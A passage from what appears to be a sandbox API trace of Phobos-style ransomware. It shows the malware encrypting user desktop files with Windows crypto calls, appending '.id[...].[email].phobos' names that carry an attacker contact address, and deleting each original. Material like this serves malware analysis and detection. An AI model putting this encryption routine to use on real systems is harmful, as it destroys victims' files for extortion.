"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ab3rdr.docx")) returned 0x20 [0195.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\aB3Rdr.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ab3rdr.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\aB3Rdr.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ab3rdr.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.761] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.761] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\aB3Rdr.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ab3rdr.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.762] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.762] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5a9f, lpOverlapped=0x0) returned 1 [0195.764] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5aa0, dwBufLen=0x5aa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5aa0) returned 1 [0195.765] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5aa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5aa0, lpOverlapped=0x0) returned 1 [0195.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.766] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.766] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.766] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.766] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.766] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.766] CloseHandle (hObject=0xb8) returned 1 [0195.766] CloseHandle (hObject=0xac) returned 1 [0195.766] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\aB3Rdr.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ab3rdr.docx")) returned 1 [0195.767] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\EgdjDG3M_GA4pVcf v.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\egdjdg3m_ga4pvcf v.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.770] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=83362) returned 1 [0195.770] CloseHandle (hObject=0xac) returned 1 [0195.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\EgdjDG3M_GA4pVcf v.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\egdjdg3m_ga4pvcf v.bmp")) returned 0x20 [0195.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\EgdjDG3M_GA4pVcf v.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\egdjdg3m_ga4pvcf v.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\EgdjDG3M_GA4pVcf v.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\egdjdg3m_ga4pvcf v.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.770] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.770] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\EgdjDG3M_GA4pVcf v.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\egdjdg3m_ga4pvcf v.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.771] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.771] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.771] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x145a2, lpOverlapped=0x0) returned 1 [0195.774] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x145b0, dwBufLen=0x145b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x145b0) returned 1 [0195.774] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x145b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x145b0, lpOverlapped=0x0) returned 1 [0195.776] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.776] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.776] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.776] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.776] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.776] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.776] CloseHandle (hObject=0xac) returned 1 [0195.776] CloseHandle (hObject=0xb8) returned 1 [0195.776] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\EgdjDG3M_GA4pVcf v.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\egdjdg3m_ga4pvcf v.bmp")) returned 1 [0195.778] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\lTqEzeGMbsz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ltqezegmbsz.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.780] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=34275) returned 1 [0195.780] CloseHandle (hObject=0xb8) returned 1 [0195.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\lTqEzeGMbsz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ltqezegmbsz.png")) returned 0x20 [0195.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\lTqEzeGMbsz.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ltqezegmbsz.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\lTqEzeGMbsz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ltqezegmbsz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.780] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.780] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\lTqEzeGMbsz.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ltqezegmbsz.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.781] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.781] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.781] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x85e3, lpOverlapped=0x0) returned 1 [0195.783] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x85f0, dwBufLen=0x85f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x85f0) returned 1 [0195.783] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x85f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x85f0, lpOverlapped=0x0) returned 1 [0195.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.785] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.785] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.785] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.785] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.785] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.785] CloseHandle (hObject=0xb8) returned 1 [0195.785] CloseHandle (hObject=0xac) returned 1 [0195.785] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\lTqEzeGMbsz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ltqezegmbsz.png")) returned 1 [0195.786] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\NzbYhgr7XRG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\nzbyhgr7xrg.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.789] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=32922) returned 1 [0195.789] CloseHandle (hObject=0xac) returned 1 [0195.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\NzbYhgr7XRG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\nzbyhgr7xrg.wav")) returned 0x20 [0195.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\NzbYhgr7XRG.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\nzbyhgr7xrg.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\NzbYhgr7XRG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\nzbyhgr7xrg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.789] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.789] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\NzbYhgr7XRG.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\nzbyhgr7xrg.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.790] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.790] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x809a, lpOverlapped=0x0) returned 1 [0195.792] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80a0, dwBufLen=0x80a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x80a0) returned 1 [0195.793] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x80a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x80a0, lpOverlapped=0x0) returned 1 [0195.794] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.794] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.794] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.794] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.794] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.794] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.794] CloseHandle (hObject=0xac) returned 1 [0195.794] CloseHandle (hObject=0xb8) returned 1 [0195.795] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\NzbYhgr7XRG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\nzbyhgr7xrg.wav")) returned 1 [0195.796] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\pAYwNn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\paywnn.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.797] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=99385) returned 1 [0195.797] CloseHandle (hObject=0xb8) returned 1 [0195.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\pAYwNn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\paywnn.mp4")) returned 0x20 [0195.797] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\pAYwNn.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\paywnn.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\pAYwNn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\paywnn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.797] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.798] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\pAYwNn.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\paywnn.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.799] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.799] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.799] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18439, lpOverlapped=0x0) returned 1 [0195.965] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18440, dwBufLen=0x18440 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18440) returned 1 [0195.966] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x18440, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x18440, lpOverlapped=0x0) returned 1 [0195.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.969] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.969] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.969] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.969] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.969] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.969] CloseHandle (hObject=0xb8) returned 1 [0195.969] CloseHandle (hObject=0xac) returned 1 [0195.969] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\pAYwNn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\paywnn.mp4")) returned 1 [0195.971] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\NwMSUJw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\nwmsujw.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.971] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=47707) returned 1 [0195.971] CloseHandle (hObject=0xac) returned 1 [0195.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\NwMSUJw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\nwmsujw.m4a")) returned 0x20 [0195.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\NwMSUJw.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\nwmsujw.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\NwMSUJw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\nwmsujw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.972] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.972] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: 